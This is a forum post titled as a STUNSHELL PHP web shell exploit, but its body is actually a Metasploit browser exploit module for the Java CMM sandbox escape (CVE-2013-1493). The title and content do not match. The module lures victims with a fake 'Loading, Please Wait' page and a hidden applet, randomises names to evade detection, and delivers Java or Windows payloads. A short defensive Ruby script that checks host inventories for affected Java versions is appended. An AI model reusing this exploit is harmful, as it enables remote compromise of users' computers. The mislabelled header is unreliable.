STUNSHELL PHP Web Shell Remote Code Execution

Original poster, posted 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # The applet class files ship with the framework under data/exploits/cve-2013-1493
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The loader class is renamed per run so the class name is not a static indicator
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
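The module description above states the affected range as Java 7u15 and earlier and 6u41 and earlier. As an added example, not part of the forum post or of the Metasploit module, the Ruby below turns that range into a triage check a defender can run over an inventory of installed Java builds. The affected-version table is taken only from the description, the inventory lines are constructed, and the function names are my own.

```ruby
# Added example, not part of the forum post or of the Metasploit module above.
# Maps the Java families the module description names to the last update
# level it lists as affected (7u15 and earlier, 6u41 and earlier).
JAVA_CMM_AFFECTED = { 6 => 41, 7 => 15 }.freeze

# Parses a Java runtime version string into [family, update].
# Accepts the "1.7.0_15" / "1.6.0_41-b02" form printed by `java -version`
# and the short "7u15" form used in Oracle advisories; returns nil otherwise.
def parse_java_version(str)
  if (m = str.strip.match(/\A1\.(\d+)\.\d+(?:_(\d+))?/))
    [m[1].to_i, m[2].to_i]   # m[2] is nil without an update suffix; nil.to_i == 0
  elsif (m = str.strip.match(/\A(\d+)u(\d+)\z/i))
    [m[1].to_i, m[2].to_i]
  end
end

# True when the version lies inside the range the module description lists
# as affected by CVE-2013-1493. Unknown families and unparsable strings are
# reported as not affected so they can be triaged by hand instead.
def java_cmm_affected?(str)
  family, update = parse_java_version(str)
  return false if family.nil?
  last_affected = JAVA_CMM_AFFECTED[family]
  !last_affected.nil? && update <= last_affected
end

# Constructed inventory ("host<TAB>version" per line), not real data.
SAMPLE_INVENTORY = <<~INV
  ws-01\t1.7.0_15-b03
  ws-02\t1.7.0_17-b02
  ws-03\t1.6.0_41-b02
  ws-04\t1.6.0_43-b01
  ws-05\t7u15
  ws-06\tunknown
INV

# Returns the host names whose Java build falls in the affected range.
def affected_hosts(inventory)
  inventory.each_line
           .map { |line| line.chomp.split("\t", 2) }
           .select { |_host, version| version && java_cmm_affected?(version) }
           .map { |host, _version| host }
end

if __FILE__ == $0
  puts "Hosts in the affected range: #{affected_hosts(SAMPLE_INVENTORY).join(', ')}"
end
```

Versions from a later family (Java 8 and up) are deliberately reported as not affected because the description says nothing about them; if you extend the table, keep the "last affected update" semantics so the comparison stays a simple `<=`.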